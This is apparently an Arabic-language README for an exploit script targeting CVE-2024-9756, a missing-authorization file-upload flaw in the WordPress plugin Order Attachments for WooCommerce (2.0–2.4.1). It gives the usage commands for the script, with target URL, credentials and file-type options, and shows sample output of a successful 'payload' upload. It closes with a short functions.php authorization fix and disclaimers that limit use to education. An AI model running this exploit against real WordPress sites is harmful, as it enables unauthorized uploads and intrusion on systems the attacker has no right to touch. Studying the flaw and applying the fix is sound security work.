
Order Attachments for WooCommerce 2.0 - 2.4.1 - نقص التصريح للمستخدمين المصادقين (مشترك+) مما يسمح بتحميل ملفات تعسفية محدودة
يستغل هذا الاستغلال ثغرة رفع ملفات عشوائية محدودة غير مصرح بها في إضافة Order Attachments for WooCommerce (الإصدارات 2.0 إلى 2.4.1) لووردبريس.
تسمح الثغرة للمستخدمين المصادق عليهم (مشترك فما فوق) برفع أنواع ملفات مقيدة دون إذن مناسب.
هذا البرنامج النصي لأغراض تعليمية وبحثية أمنية فقط. أي استخدام غير مصرح به لهذا الاستغلال على أنظمة لا تملكها يعتبر غير قانوني تمامًا.
تأكد من توفر ما يلي قبل تشغيل الاستغلال:
requests → قم بالتثبيت باستخدام:
pip install requests
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD>
مثال:
python3 CVE-2024-9756.py -u http://192.168.100.74:888/wordpress4 -un khaled -p mypassword
يمكنك تحديد أسماء ملفات مخصصة و معرفات الطلب:
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> --filename="custom.png" --filetype="image/png"
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> -o 200
في حالة النجاح، سيعيد البرنامج النصي رابط الملف المرفوع:
[*] Initiating authentication...
[✔] Authentication successful.
[*] Deploying payload: Nxploit.jpg to order 196...
[✔] Payload successfully deployed!
🔗 File URL: http://192.168.100.74:888/wordpress4/wp-content/uploads/2025/03/Nxploit.jpg
functions.php لحظر wp_ajax_wcoa_add_attachment من المستخدمين غير المصرح لهم:
if (!current_user_can('manage_woocommerce')) {
wp_send_json_error(['message' => 'Unauthorized'], 403);
exit;
}
يتم نشر هذا الاستغلال للأغراض التعليمية والبحث الأمني فقط. الاستخدام غير المصرح به ضد الأنظمة دون إذن صريح غير قانوني ويعاقب عليه بموجب قوانين الأمن السيبراني. استخدمه على مسؤوليتك الخاصة.